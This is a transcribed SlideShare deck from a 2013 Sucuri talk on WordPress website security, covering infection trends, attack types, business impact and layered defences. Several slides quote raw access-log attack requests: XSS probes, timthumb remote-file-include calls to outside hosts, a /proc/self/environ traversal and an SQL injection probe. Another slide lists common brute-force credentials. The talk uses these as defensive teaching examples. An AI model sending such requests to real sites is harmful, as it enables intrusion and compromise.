SlideShare a Scribd company logo

Word press website security

Download as PPTX, PDF
Tony Perez
Tony Perez
1 of 51
WordPressWebsite Security
 Specialization:  Website Security  Incident Handling  LogAnalysis  Special Interests:  Warfare  Weapons  Martial Arts Tony Perez | @perezbox | @sucuri_security5/1/2013 2
 Website Security Company  GlobalOperations  AllWebsite Platforms  Scan 1M Unique Domains a Month  Block 1M web attacks a Month  300 – 500 websites a day  Signature / Heuristic Based  24/5 - 18/2 operations 5/1/2013 Tony Perez | @perezbox | @sucuri_security 3
 Trends  Threats  Defenses 5/1/2013 Tony Perez | @perezbox | @sucuri_security 4 SIMPLE RIGHT?
Tony Perez | @perezbox | @sucuri_security5/1/2013 5
5/1/2013 Tony Perez | @perezbox | @sucuri_security 6 Malicious Links 2011 2012
5/1/2013 Tony Perez | @perezbox | @sucuri_security 7
Known Malware Unkown Malware 5/1/2013 Tony Perez | @perezbox | @sucuri_security 8
Not Infected Infected 5/1/2013 Tony Perez | @perezbox | @sucuri_security 9
26% 19% 16% 14% 11% 4% 10% Remote iFrame Includes Remote JavaScript Includes SPAM Injections Obfuscated / Encoded JavaScript Conditional Redirects Defacements Other 5/1/2013 Tony Perez | @perezbox | @sucuri_security 10
5/1/2013 Tony Perez | @perezbox | @sucuri_security 11 Apache SSH Email Server  Going Deeper than the application layer, targeting the server.  Server Polymorphism – a.k.a changes a lot
 StickWith Reputable Sources  Gravity Forms  JetPack Forms  Generating SPAM emails, resource hogs  IP blacklisting  LeverageCaptchas 5/1/2013 Tony Perez | @perezbox | @sucuri_security 12
5/1/2013 Tony Perez | @perezbox | @sucuri_security 13
 Pharmacy  Payday Loans 5/1/2013 Tony Perez | @perezbox | @sucuri_security 14
5/1/2013 Tony Perez | @perezbox | @sucuri_security 15  Access – so easy, yet so weak
5/1/2013 Tony Perez | @perezbox | @sucuri_security 16
5/1/2013 Tony Perez | @perezbox | @sucuri_security 17
5/1/2013 Tony Perez | @perezbox | @sucuri_security 18 Site 1 Site 2Site 3 Site 4WordPress 2.8 WordPress 3.5.1 WordPress 3.4.2 WordPress 3.0
5/1/2013 Tony Perez | @perezbox | @sucuri_security 19
5/1/2013 Tony Perez | @perezbox | @sucuri_security 20
5/1/2013 Tony Perez | @perezbox | @sucuri_security 21
5/1/2013 Tony Perez | @perezbox | @sucuri_security 22
5/1/2013 Tony Perez | @perezbox | @sucuri_security 23
5/1/2013 Tony Perez | @perezbox | @sucuri_security 24
 W3TC &WP Super Cache  Remote Command Execution (RCE)Vulnerability  WPMM  SPAM Injections (Bad Plugin)  Social MediaWidget  SPAM Injections (Core Commit) 5/1/2013 Tony Perez | @perezbox | @sucuri_security 25
 Explosion in the Malware as a Service (MaaS) trade  Yes, pay someone to hack for you  Different tools to break in and generate payloads  Brute force and vulnerability exploits Malware Payloads  Blackhole Exploit Kit – Today’s market leader  2013 – SophoLabs 5/1/2013 Tony Perez | @perezbox | @sucuri_security 26
5/1/2013 Tony Perez | @perezbox | @sucuri_security 27
5/1/2013 Tony Perez | @perezbox | @sucuri_security 28
5/1/2013 Tony Perez | @perezbox | @sucuri_security 29
5/1/2013 Tony Perez | @perezbox | @sucuri_security 30  Use for malware?  Burrow into network?  Steal data? What kind of website do you have?
5/1/2013 Tony Perez | @perezbox | @sucuri_security 31 38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" 123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268  Stored  Reflective
[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0” 83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&amp;sa=U&amp;ei=vGBcUYS1IcOaiQLxu4HIBg&amp;ved=0CCYQFjAE&amp;usg=AFQjCNFN1APEnX9- WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6” 82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 5/1/2013 Tony Perez | @perezbox | @sucuri_security 32
5/1/2013 Tony Perez | @perezbox | @sucuri_security 33 62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9”
5/1/2013 Tony Perez | @perezbox | @sucuri_security 34
5/1/2013 Tony Perez | @perezbox | @sucuri_security 35
 Brand Reputation  Legal Implications  Impact to Sales  Blacklisted by Search Engines  Blacklisted by Payment processors  Worst Day Of your Life 5/1/2013 Tony Perez | @perezbox | @sucuri_security 36
5/1/2013 Tony Perez | @perezbox | @sucuri_security 37
 Access Control  Vulnerabilities  Hosting  Online Habits  Social Media  Passwords 5/1/2013 Tony Perez | @perezbox | @sucuri_security 38
“It’s about risk reduction… risk will never be zero…” 5/1/2013 Tony Perez | @perezbox | @sucuri_security 39
 We run on WordPress  CurrentVersion of course  Sucuri properties suffer:  ~125,000 web based attacks a month on average  ~4,000 attacks a day ▪ This spikes on occasion  Doesn’t include server level attacks  All flavors of attacks 5/1/2013 Tony Perez | @perezbox | @sucuri_security 40
 Instead of telling you what you need to do, I’ll just tell you what we do;  Our philosophy and approach is very simple, complex things break in complex ways;  We focus on the areas that we can immediately control;  We believe in layered defenses; 5/1/2013 Tony Perez | @perezbox | @sucuri_security 41
5/1/2013 Tony Perez | @perezbox | @sucuri_security 42 Stay Current IPWhitelisting Two Factor Authentication Strong / Unique Password Web Application Firewall
5/1/2013 Tony Perez | @perezbox | @sucuri_security 43 IPWhitelisting Server Isolation Public Key Authentication Host Intrusion Detection System (HIDS) Log Everything
Category Tool Type Prevention – SoftwareVulnerabilities Sucuri CloudProxy Service Prevention – Access Control Sucuri CloudProxy Service Detection Sucuri Monitoring Service Remediation Sucuri Service Password Management 1Password / LastPass Application Host-based Intrusion Detection System OSSEC Application Access Control Enforcement Login Secure Solutions Plugin Two-Factor Authentication Google Authenticator Plugin Application Auditing Sucuri Premium Plugin Backups BackupBuddy Plugin 5/1/2013 Tony Perez | @perezbox | @sucuri_security 44
5/1/2013 Tony Perez | @perezbox | @sucuri_security 45 Category Location Type DisableTheme / Plugin Editor wp-config.php Preventive measure Disable PHP execution .htacces – uploads / images / wp-includes / etc.. Preventive measure Permissions Directories 755 / Files 644 Preventive measure
5/1/2013 Tony Perez | @perezbox | @sucuri_security 46 • Don’t know what you’re doing? • Go with a managed host…
5/1/2013 Tony Perez | @perezbox | @sucuri_security 47 Doesn’t mean you won’t ever get infected.
Complex . Long . Unique . Esoteric “CLUE” 5/1/2013 Tony Perez | @perezbox | @sucuri_security 48 652,911 [log] => admin 10173 [log] => test 8992 [log] => administrator 8921 [log] => Admin 2495 [log] => root 16,798 [pwd] => admin 10,880 [pwd] => 123456 9,727 [pwd] => 666666 9,106 [pwd] => 111111 7,882 [pwd] => 12345678 7,717 [pwd] => qwerty 7,295 [pwd] => 1234567 USERNAMES PASSWORDS Epic Fail
 Access  Login Secure Solution  Stealth Login  Limit Login  Scanning  WordFence  Anti-Malwatch  Defense in Depth  BetterWP Security  BulletProof Security  Vulnerabilities  MVIS Security Center 5/1/2013 Tony Perez | @perezbox | @sucuri_security 49
5/1/2013 Tony Perez | @perezbox | @sucuri_security 50 Name Tool Sucuri Blog http://blog.sucuri.net SucuriTV http://sucuri.tv WordPress Forum – Hacked http://wordpress.org/tags/hacked WordPress Forum – Malware http://wordpress.org/tags/malware Badware Busters https://badwarebusters.org Perishable Press http://perishablepress.com/category/web-design/security/ Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked- sites WordPress.org Hardening http://codex.wordpress.org/Hardening_WordPress GoogleWebmasterTools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633 Secunia SecurityAdvisories http://secunia.com/community/advisories/search/?search=wordpress Exploit-DB http://www.exploit- db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
5/1/2013 Tony Perez | @perezbox | @sucuri_security 51

Recommended

Website Security - Latest and Greatest (WordPress 2014)
Website Security - Latest and Greatest (WordPress 2014)Website Security - Latest and Greatest (WordPress 2014)
Website Security - Latest and Greatest (WordPress 2014)Tony Perez
 
WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security
WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri SecurityWordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security
WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri SecurityTony Perez
 
WordPress Website Security - Trends, Threats, Defenses
WordPress Website Security - Trends, Threats, DefensesWordPress Website Security - Trends, Threats, Defenses
WordPress Website Security - Trends, Threats, DefensesTony Perez
 
Introduction to Personal Privacy and Security
Introduction to Personal Privacy and SecurityIntroduction to Personal Privacy and Security
Introduction to Personal Privacy and SecurityRobert Hurlbut
 
How To Build The Perfect Backtrack 4 Usb Drive
How To Build The Perfect Backtrack 4 Usb DriveHow To Build The Perfect Backtrack 4 Usb Drive
How To Build The Perfect Backtrack 4 Usb Drivekriggins
 
NetVU Tech-4290/4390
NetVU Tech-4290/4390NetVU Tech-4290/4390
NetVU Tech-4290/4390jreverri
 
Low Cost Tools for Security Challenges - Timothy De Block
Low Cost Tools for Security Challenges - Timothy De BlockLow Cost Tools for Security Challenges - Timothy De Block
Low Cost Tools for Security Challenges - Timothy De BlockIT-oLogy
 
Dc and Online Security Presentation
Dc and Online Security PresentationDc and Online Security Presentation
Dc and Online Security Presentationakdm28
 

Recommended

Website Security - Latest and Greatest (WordPress 2014)
Website Security - Latest and Greatest (WordPress 2014)Website Security - Latest and Greatest (WordPress 2014)
Website Security - Latest and Greatest (WordPress 2014)Tony Perez
 
WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security
WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri SecurityWordCamp Minneapolis 2014 - Website Security Presentation - Sucuri Security
WordCamp Minneapolis 2014 - Website Security Presentation - Sucuri SecurityTony Perez
 
WordPress Website Security - Trends, Threats, Defenses
WordPress Website Security - Trends, Threats, DefensesWordPress Website Security - Trends, Threats, Defenses
WordPress Website Security - Trends, Threats, DefensesTony Perez
 
Introduction to Personal Privacy and Security
Introduction to Personal Privacy and SecurityIntroduction to Personal Privacy and Security
Introduction to Personal Privacy and SecurityRobert Hurlbut
 
How To Build The Perfect Backtrack 4 Usb Drive
How To Build The Perfect Backtrack 4 Usb DriveHow To Build The Perfect Backtrack 4 Usb Drive
How To Build The Perfect Backtrack 4 Usb Drivekriggins
 
NetVU Tech-4290/4390
NetVU Tech-4290/4390NetVU Tech-4290/4390
NetVU Tech-4290/4390jreverri
 
Low Cost Tools for Security Challenges - Timothy De Block
Low Cost Tools for Security Challenges - Timothy De BlockLow Cost Tools for Security Challenges - Timothy De Block
Low Cost Tools for Security Challenges - Timothy De BlockIT-oLogy
 
Dc and Online Security Presentation
Dc and Online Security PresentationDc and Online Security Presentation
Dc and Online Security Presentationakdm28
 
Firefox OS dans le web - Journée du libre 2015 Lille
Firefox OS dans le web - Journée du libre 2015 LilleFirefox OS dans le web - Journée du libre 2015 Lille
Firefox OS dans le web - Journée du libre 2015 LilleChristophe Villeneuve
 
La securite pour les développeurs au RMLL 2015
La securite pour les développeurs au RMLL 2015La securite pour les développeurs au RMLL 2015
La securite pour les développeurs au RMLL 2015Christophe Villeneuve
 
Firefox os et vie privee - RMLL 2015
Firefox os et vie privee - RMLL 2015Firefox os et vie privee - RMLL 2015
Firefox os et vie privee - RMLL 2015Christophe Villeneuve
 
Abhay ppt
Abhay pptAbhay ppt
Abhay pptAbhay Jaiswal
 
Visites technos au secondaire - Maxime Jobin
Visites technos au secondaire - Maxime JobinVisites technos au secondaire - Maxime Jobin
Visites technos au secondaire - Maxime JobinMaxime Jobin
 
Le pouvoir d'être Visible ou Invisible sur Internet
Le pouvoir d'être Visible ou Invisible sur InternetLe pouvoir d'être Visible ou Invisible sur Internet
Le pouvoir d'être Visible ou Invisible sur InternetChristophe Villeneuve
 
Sécurité: Ne soyez pas à risque
Sécurité: Ne soyez pas à risqueSécurité: Ne soyez pas à risque
Sécurité: Ne soyez pas à risqueMaxime Jobin
 
Gestion de la sécurité des données en France - étude 2016
Gestion de la sécurité des données en France - étude 2016Gestion de la sécurité des données en France - étude 2016
Gestion de la sécurité des données en France - étude 2016Laura Peytavin
 
Windows 10 conference
Windows 10 conferenceWindows 10 conference
Windows 10 conferencedynamicemploi
 
Mission impossible, pas possible en drupal - RMLL 2015
Mission impossible, pas possible en drupal - RMLL 2015Mission impossible, pas possible en drupal - RMLL 2015
Mission impossible, pas possible en drupal - RMLL 2015Christophe Villeneuve
 
Firefox OS - Api battery status
Firefox OS - Api battery statusFirefox OS - Api battery status
Firefox OS - Api battery statusChristophe Villeneuve
 
Le nouveau AMP : apache mariadb php
Le nouveau AMP : apache mariadb phpLe nouveau AMP : apache mariadb php
Le nouveau AMP : apache mariadb phpChristophe Villeneuve
 
Le web en http 2
Le web en http 2Le web en http 2
Le web en http 2Christophe Villeneuve
 
Firefox et Firefox OS et vie privee - Journée du libre 2015 Lille
Firefox et Firefox OS et vie privee - Journée du libre 2015 LilleFirefox et Firefox OS et vie privee - Journée du libre 2015 Lille
Firefox et Firefox OS et vie privee - Journée du libre 2015 LilleChristophe Villeneuve
 
Introduction à WordPress sous Nginx
Introduction à WordPress sous NginxIntroduction à WordPress sous Nginx
Introduction à WordPress sous NginxMaxime Jobin
 
Conférence : Réserver ses vacances sur internet
Conférence : Réserver ses vacances sur internetConférence : Réserver ses vacances sur internet
Conférence : Réserver ses vacances sur internetdynamicemploi
 
S2B Solution - Présentation
S2B Solution - PrésentationS2B Solution - Présentation
S2B Solution - PrésentationMaxime Jobin
 
Protéger votre vie privee sur internet
Protéger votre vie privee sur internetProtéger votre vie privee sur internet
Protéger votre vie privee sur internetChristophe Villeneuve
 
Seminaire sécurité : Politique de sécurité pour les entreprise, comment s'y p...
Seminaire sécurité : Politique de sécurité pour les entreprise, comment s'y p...Seminaire sécurité : Politique de sécurité pour les entreprise, comment s'y p...
Seminaire sécurité : Politique de sécurité pour les entreprise, comment s'y p...Faouzi Maddouri
 
Embarquer le web dans un smartphone Firefox OS - RMLL 2015
Embarquer le web dans un smartphone Firefox OS - RMLL 2015Embarquer le web dans un smartphone Firefox OS - RMLL 2015
Embarquer le web dans un smartphone Firefox OS - RMLL 2015Christophe Villeneuve
 
Joomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The BasicsJoomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The BasicsTony Perez
 
Website Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the BasicsWebsite Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the BasicsTony Perez
 

More Related Content

Viewers also liked

Firefox OS dans le web - Journée du libre 2015 Lille
Firefox OS dans le web - Journée du libre 2015 LilleFirefox OS dans le web - Journée du libre 2015 Lille
Firefox OS dans le web - Journée du libre 2015 LilleChristophe Villeneuve
 
La securite pour les développeurs au RMLL 2015
La securite pour les développeurs au RMLL 2015La securite pour les développeurs au RMLL 2015
La securite pour les développeurs au RMLL 2015Christophe Villeneuve
 
Firefox os et vie privee - RMLL 2015
Firefox os et vie privee - RMLL 2015Firefox os et vie privee - RMLL 2015
Firefox os et vie privee - RMLL 2015Christophe Villeneuve
 
Visites technos au secondaire - Maxime Jobin
Visites technos au secondaire - Maxime JobinVisites technos au secondaire - Maxime Jobin
Visites technos au secondaire - Maxime JobinMaxime Jobin
 
Le pouvoir d'être Visible ou Invisible sur Internet
Le pouvoir d'être Visible ou Invisible sur InternetLe pouvoir d'être Visible ou Invisible sur Internet
Le pouvoir d'être Visible ou Invisible sur InternetChristophe Villeneuve
 
Sécurité: Ne soyez pas à risque
Sécurité: Ne soyez pas à risqueSécurité: Ne soyez pas à risque
Sécurité: Ne soyez pas à risqueMaxime Jobin
 
Gestion de la sécurité des données en France - étude 2016
Gestion de la sécurité des données en France - étude 2016Gestion de la sécurité des données en France - étude 2016
Gestion de la sécurité des données en France - étude 2016Laura Peytavin
 
Windows 10 conference
Windows 10 conferenceWindows 10 conference
Windows 10 conferencedynamicemploi
 
Mission impossible, pas possible en drupal - RMLL 2015
Mission impossible, pas possible en drupal - RMLL 2015Mission impossible, pas possible en drupal - RMLL 2015
Mission impossible, pas possible en drupal - RMLL 2015Christophe Villeneuve
 
Firefox et Firefox OS et vie privee - Journée du libre 2015 Lille
Firefox et Firefox OS et vie privee - Journée du libre 2015 LilleFirefox et Firefox OS et vie privee - Journée du libre 2015 Lille
Firefox et Firefox OS et vie privee - Journée du libre 2015 LilleChristophe Villeneuve
 
Introduction à WordPress sous Nginx
Introduction à WordPress sous NginxIntroduction à WordPress sous Nginx
Introduction à WordPress sous NginxMaxime Jobin
 
Conférence : Réserver ses vacances sur internet
Conférence : Réserver ses vacances sur internetConférence : Réserver ses vacances sur internet
Conférence : Réserver ses vacances sur internetdynamicemploi
 
S2B Solution - Présentation
S2B Solution - PrésentationS2B Solution - Présentation
S2B Solution - PrésentationMaxime Jobin
 
Protéger votre vie privee sur internet
Protéger votre vie privee sur internetProtéger votre vie privee sur internet
Protéger votre vie privee sur internetChristophe Villeneuve
 
Seminaire sécurité : Politique de sécurité pour les entreprise, comment s'y p...
Seminaire sécurité : Politique de sécurité pour les entreprise, comment s'y p...Seminaire sécurité : Politique de sécurité pour les entreprise, comment s'y p...
Seminaire sécurité : Politique de sécurité pour les entreprise, comment s'y p...Faouzi Maddouri
 
Embarquer le web dans un smartphone Firefox OS - RMLL 2015
Embarquer le web dans un smartphone Firefox OS - RMLL 2015Embarquer le web dans un smartphone Firefox OS - RMLL 2015
Embarquer le web dans un smartphone Firefox OS - RMLL 2015Christophe Villeneuve
 

Viewers also liked (20)

Firefox OS dans le web - Journée du libre 2015 Lille
Firefox OS dans le web - Journée du libre 2015 LilleFirefox OS dans le web - Journée du libre 2015 Lille
Firefox OS dans le web - Journée du libre 2015 Lille
 
La securite pour les développeurs au RMLL 2015
La securite pour les développeurs au RMLL 2015La securite pour les développeurs au RMLL 2015
La securite pour les développeurs au RMLL 2015
 
Firefox os et vie privee - RMLL 2015
Firefox os et vie privee - RMLL 2015Firefox os et vie privee - RMLL 2015
Firefox os et vie privee - RMLL 2015
 
Abhay ppt
Abhay pptAbhay ppt
Abhay ppt
 
Visites technos au secondaire - Maxime Jobin
Visites technos au secondaire - Maxime JobinVisites technos au secondaire - Maxime Jobin
Visites technos au secondaire - Maxime Jobin
 
Le pouvoir d'être Visible ou Invisible sur Internet
Le pouvoir d'être Visible ou Invisible sur InternetLe pouvoir d'être Visible ou Invisible sur Internet
Le pouvoir d'être Visible ou Invisible sur Internet
 
Sécurité: Ne soyez pas à risque
Sécurité: Ne soyez pas à risqueSécurité: Ne soyez pas à risque
Sécurité: Ne soyez pas à risque
 
Gestion de la sécurité des données en France - étude 2016
Gestion de la sécurité des données en France - étude 2016Gestion de la sécurité des données en France - étude 2016
Gestion de la sécurité des données en France - étude 2016
 
Windows 10 conference
Windows 10 conferenceWindows 10 conference
Windows 10 conference
 
Mission impossible, pas possible en drupal - RMLL 2015
Mission impossible, pas possible en drupal - RMLL 2015Mission impossible, pas possible en drupal - RMLL 2015
Mission impossible, pas possible en drupal - RMLL 2015
 
Firefox OS - Api battery status
Firefox OS - Api battery statusFirefox OS - Api battery status
Firefox OS - Api battery status
 
Le nouveau AMP : apache mariadb php
Le nouveau AMP : apache mariadb phpLe nouveau AMP : apache mariadb php
Le nouveau AMP : apache mariadb php
 
Le web en http 2
Le web en http 2Le web en http 2
Le web en http 2
 
Firefox et Firefox OS et vie privee - Journée du libre 2015 Lille
Firefox et Firefox OS et vie privee - Journée du libre 2015 LilleFirefox et Firefox OS et vie privee - Journée du libre 2015 Lille
Firefox et Firefox OS et vie privee - Journée du libre 2015 Lille
 
Introduction à WordPress sous Nginx
Introduction à WordPress sous NginxIntroduction à WordPress sous Nginx
Introduction à WordPress sous Nginx
 
Conférence : Réserver ses vacances sur internet
Conférence : Réserver ses vacances sur internetConférence : Réserver ses vacances sur internet
Conférence : Réserver ses vacances sur internet
 
S2B Solution - Présentation
S2B Solution - PrésentationS2B Solution - Présentation
S2B Solution - Présentation
 
Protéger votre vie privee sur internet
Protéger votre vie privee sur internetProtéger votre vie privee sur internet
Protéger votre vie privee sur internet
 
Seminaire sécurité : Politique de sécurité pour les entreprise, comment s'y p...
Seminaire sécurité : Politique de sécurité pour les entreprise, comment s'y p...Seminaire sécurité : Politique de sécurité pour les entreprise, comment s'y p...
Seminaire sécurité : Politique de sécurité pour les entreprise, comment s'y p...
 
Embarquer le web dans un smartphone Firefox OS - RMLL 2015
Embarquer le web dans un smartphone Firefox OS - RMLL 2015Embarquer le web dans un smartphone Firefox OS - RMLL 2015
Embarquer le web dans un smartphone Firefox OS - RMLL 2015
 

Similar to Word press website security

Joomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The BasicsJoomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The BasicsTony Perez
 
Website Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the BasicsWebsite Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the BasicsTony Perez
 
Website Security - It Begins With Good Posture
Website Security - It Begins With Good PostureWebsite Security - It Begins With Good Posture
Website Security - It Begins With Good PostureTony Perez
 
Navigating the Security Landscape
Navigating the Security LandscapeNavigating the Security Landscape
Navigating the Security LandscapeSucuri
 
WordPress Security - Learning From Hacks
WordPress Security - Learning From HacksWordPress Security - Learning From Hacks
WordPress Security - Learning From HacksTony Perez
 
2018 Hacked Website Trends
2018 Hacked Website Trends2018 Hacked Website Trends
2018 Hacked Website TrendsSucuri
 
Information security - what is going on 2016
Information security - what is going on 2016Information security - what is going on 2016
Information security - what is going on 2016Tomppa Järvinen
 
NIC 2017 - Attack and detection in Windows Environments
NIC 2017 - Attack and detection in Windows EnvironmentsNIC 2017 - Attack and detection in Windows Environments
NIC 2017 - Attack and detection in Windows EnvironmentsOddvar Moe
 
Cyber security awareness
Cyber security awarenessCyber security awareness
Cyber security awarenessJason Murray
 
DOES15 - Mike Bland - Pain Is Over, If You Want It
DOES15 - Mike Bland - Pain Is Over, If You Want ItDOES15 - Mike Bland - Pain Is Over, If You Want It
DOES15 - Mike Bland - Pain Is Over, If You Want ItGene Kim
 
Phish training final
Phish training finalPhish training final
Phish training finalJen Ruhman
 

Similar to Word press website security (14)

Joomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The BasicsJoomla! Day Atlanta 2014 - Website Security - The Basics
Joomla! Day Atlanta 2014 - Website Security - The Basics
 
Website Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the BasicsWebsite Security (WordPress) - It's About the Basics
Website Security (WordPress) - It's About the Basics
 
Website Security - It Begins With Good Posture
Website Security - It Begins With Good PostureWebsite Security - It Begins With Good Posture
Website Security - It Begins With Good Posture
 
Navigating the Security Landscape
Navigating the Security LandscapeNavigating the Security Landscape
Navigating the Security Landscape
 
WordPress Security - Learning From Hacks
WordPress Security - Learning From HacksWordPress Security - Learning From Hacks
WordPress Security - Learning From Hacks
 
12990739.ppt
12990739.ppt12990739.ppt
12990739.ppt
 
2018 Hacked Website Trends
2018 Hacked Website Trends2018 Hacked Website Trends
2018 Hacked Website Trends
 
Information security - what is going on 2016
Information security - what is going on 2016Information security - what is going on 2016
Information security - what is going on 2016
 
WordPress Hardening v4
WordPress Hardening v4WordPress Hardening v4
WordPress Hardening v4
 
NIC 2017 - Attack and detection in Windows Environments
NIC 2017 - Attack and detection in Windows EnvironmentsNIC 2017 - Attack and detection in Windows Environments
NIC 2017 - Attack and detection in Windows Environments
 
Cyber security awareness
Cyber security awarenessCyber security awareness
Cyber security awareness
 
DOES15 - Mike Bland - Pain Is Over, If You Want It
DOES15 - Mike Bland - Pain Is Over, If You Want ItDOES15 - Mike Bland - Pain Is Over, If You Want It
DOES15 - Mike Bland - Pain Is Over, If You Want It
 
Phish training final
Phish training finalPhish training final
Phish training final
 
The Top Ten Insider Threats And How To Prevent Them
The Top Ten Insider Threats And How To Prevent ThemThe Top Ten Insider Threats And How To Prevent Them
The Top Ten Insider Threats And How To Prevent Them
 

More from Tony Perez

A Practical Security Framework for Website Owners
A Practical Security Framework for Website OwnersA Practical Security Framework for Website Owners
A Practical Security Framework for Website OwnersTony Perez
 
2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and Security2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and SecurityTony Perez
 
Accounting for Website Security in Higher Education
Accounting for Website Security in Higher EducationAccounting for Website Security in Higher Education
Accounting for Website Security in Higher EducationTony Perez
 
Building a Security Framework for Websites
Building a Security Framework for WebsitesBuilding a Security Framework for Websites
Building a Security Framework for WebsitesTony Perez
 
Navigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website OwnersNavigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website OwnersTony Perez
 
Business of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote WorkforceBusiness of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote WorkforceTony Perez
 
WordPress Security Begins With Good Posture
WordPress Security Begins With Good PostureWordPress Security Begins With Good Posture
WordPress Security Begins With Good PostureTony Perez
 
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users SafeTBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users SafeTony Perez
 
Hacked - What do you do now?
Hacked - What do you do now?Hacked - What do you do now?
Hacked - What do you do now?Tony Perez
 
WordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of SecurityWordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of SecurityTony Perez
 
WordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksWordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksTony Perez
 
WordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" VersionWordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" VersionTony Perez
 
Word camp orange county 2012 enduser security
Word camp orange county 2012 enduser securityWord camp orange county 2012 enduser security
Word camp orange county 2012 enduser securityTony Perez
 

More from Tony Perez (13)

A Practical Security Framework for Website Owners
A Practical Security Framework for Website OwnersA Practical Security Framework for Website Owners
A Practical Security Framework for Website Owners
 
2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and Security2017 WHD - Bridging the Divide Between Behavior and Security
2017 WHD - Bridging the Divide Between Behavior and Security
 
Accounting for Website Security in Higher Education
Accounting for Website Security in Higher EducationAccounting for Website Security in Higher Education
Accounting for Website Security in Higher Education
 
Building a Security Framework for Websites
Building a Security Framework for WebsitesBuilding a Security Framework for Websites
Building a Security Framework for Websites
 
Navigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website OwnersNavigating Online Threats - Website Security for Everyday Website Owners
Navigating Online Threats - Website Security for Everyday Website Owners
 
Business of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote WorkforceBusiness of People - Lessons Learned Building a Remote Workforce
Business of People - Lessons Learned Building a Remote Workforce
 
WordPress Security Begins With Good Posture
WordPress Security Begins With Good PostureWordPress Security Begins With Good Posture
WordPress Security Begins With Good Posture
 
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users SafeTBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
TBEX - North America 2014 - 5 Tips to Keep Your Content and Users Safe
 
Hacked - What do you do now?
Hacked - What do you do now?Hacked - What do you do now?
Hacked - What do you do now?
 
WordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of SecurityWordPress Security 2014 - The Basics of Security
WordPress Security 2014 - The Basics of Security
 
WordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's HacksWordPress Security - Dealing With Today's Hacks
WordPress Security - Dealing With Today's Hacks
 
WordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" VersionWordPress Security - The "No-BS" Version
WordPress Security - The "No-BS" Version
 
Word camp orange county 2012 enduser security
Word camp orange county 2012 enduser securityWord camp orange county 2012 enduser security
Word camp orange county 2012 enduser security
 

Word press website security

  • 2.  Specialization:  Website Security  Incident Handling  LogAnalysis  Special Interests:  Warfare  Weapons  Martial Arts Tony Perez | @perezbox | @sucuri_security5/1/2013 2
